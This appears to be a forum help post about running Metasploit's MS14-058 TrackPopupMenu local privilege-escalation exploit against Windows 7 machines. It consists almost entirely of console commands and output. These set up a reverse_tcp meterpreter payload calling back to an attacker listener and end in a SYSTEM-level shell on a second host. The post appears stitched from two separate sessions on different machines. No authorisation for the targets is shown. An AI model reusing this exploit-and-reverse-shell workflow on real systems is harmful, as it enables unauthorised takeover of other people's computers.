Windows privilege escalation exploit
Hi, I'm having trouble with exploit/windows/local/ms14_058_track_popup_menu.
Here is some info:
meterpreter > sysinfo
Computer : WORKSTATION1
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Meterpreter : x64/win64
meterpreter > getuid
Server username: CONTOSO\allenbrewer
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect.
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(ms14_058_track_popup_menu) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(ms14_058_track_popup_menu) > set LPORT 28746
LPORT => 28746
msf exploit(ms14_058_track_popup_menu) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(ms14_058_track_popup_menu) > set TARGET 1
TARGET => 1
msf exploit(ms14_058_track_popup_menu) > set SESSION 3
SESSION => 3
msf exploit(ms14_058_track_popup_menu) > set ExitOnSession false
ExitOnSession => false
msf exploit(ms14_058_track_popup_menu) > exploit -j
[*] Exploit running as background job.
[*] Launching notepad to host the exploit...
[+] Process 2268 launched.
[*] Reflectively injecting the exploit DLL into 2268...
[*] Injecting exploit into 2268...
[*] Exploit injected. Injecting payload into 2268...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[nothing (no shell) comes back]
The win32k.sys product version on the target machine is 6.1.7601.17514.
"[*] win32k.sys file version: 6.1.7601.17514 branch: 17"
Now we can get SYSTEM privileges. Thanks.
Host Name: NFS-001
OS Name: Microsoft Windows 7 Home Premium
OS Version: 6.1.7601 Service Pack 1 Build 7601
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 nfs-001\nfs @ NFS-001 192.168.108.113:4444 -> 192.168.108.197:2735 (192.168.108.197)
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > run
[*] Started reverse handler on 192.168.108.113:4444
[*] Launching notepad to host the exploit...
[+] Process 2732 launched.
[*] Reflectively injecting the exploit DLL into 2732...
[*] Injecting exploit into 2732...
[*] Exploit injected. Injecting payload into 2732...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (770048 bytes) to 192.168.108.197
[*] Meterpreter session 2 opened (192.168.108.113:4444 -> 192.168.108.197:2787) at 2015-02-10 07:46:21 +0000
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM